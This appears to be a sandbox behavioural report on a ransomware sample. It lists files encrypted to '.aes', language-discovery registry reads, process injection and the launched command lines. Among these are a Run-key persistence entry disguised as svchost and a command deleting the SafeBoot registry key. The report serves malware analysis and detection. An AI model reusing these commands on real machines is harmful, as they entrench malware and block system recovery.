File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files\7-Zip\Lang\ja.txt.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGATNGET.XML.aes N/A N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\QP.XML.aes N/A N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML.aes N/A N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL027.XML.aes N/A N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.TW.XML.aes N/A N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML.aes N/A N/A
File opened for modification C:\Program Files\7-Zip\Lang\ug.txt.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.aes N/A N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML.aes N/A N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OCRHC.DAT.aes N/A N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.aes N/A N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml.aes C:\ProgramData\local\aescrypter.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.aes C:\ProgramData\local\aescrypter.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\local\aescrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 580 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\dcomcnfgui.exe
PID 580 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\dcomcnfgui.exe
PID 580 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\dcomcnfgui.exe
PID 580 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\dcomcnfgui.exe
PID 580 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\dcomcnfgui.exe
PID 580 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\dcomcnfgui.exe
PID 580 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\dcomcnfgui.exe
PID 580 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\ucsvcsh.exe
PID 580 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\ucsvcsh.exe
PID 580 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\ucsvcsh.exe
PID 580 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\ucsvcsh.exe
PID 580 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\ucsvcsh.exe
PID 580 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\ucsvcsh.exe
PID 580 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\ucsvcsh.exe
PID 580 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE
PID 580 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe

"C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe"

C:\Windows\SysWOW64\dcomcnfgui.exe

"C:\Windows\system32\dcomcnfgui.exe" -i

C:\Windows\SysWOW64\ucsvcsh.exe

"C:\Windows\system32\ucsvcsh.exe" -i

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\dcomcnfgui.exe

"C:\Windows\system32\dcomcnfgui.exe" -i

C:\Windows\SysWOW64\ucsvcsh.exe

"C:\Windows\system32\ucsvcsh.exe" -i

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\dcomcnfgui.exe

"C:\Windows\system32\dcomcnfgui.exe" -s

C:\Windows\SysWOW64\ucsvcsh.exe

"C:\Windows\system32\ucsvcsh.exe" -s

C:\Windows\SysWOW64\ucsvcsh.exe

C:\Windows\SysWOW64\ucsvcsh.exe

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\dcomcnfgui.exe

C:\Windows\SysWOW64\dcomcnfgui.exe

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\dcomcnfgui.exe

"C:\Windows\system32\dcomcnfgui.exe" -i

C:\Windows\SysWOW64\ucsvcsh.exe

"C:\Windows\system32\ucsvcsh.exe" -i

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "C:\ProgramData\local\svchost.exe" /f

C:\Windows\SysWOW64\reg.exe

reg delete HKLM\System\CurrentControlSet\Control\SafeBoot /f

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

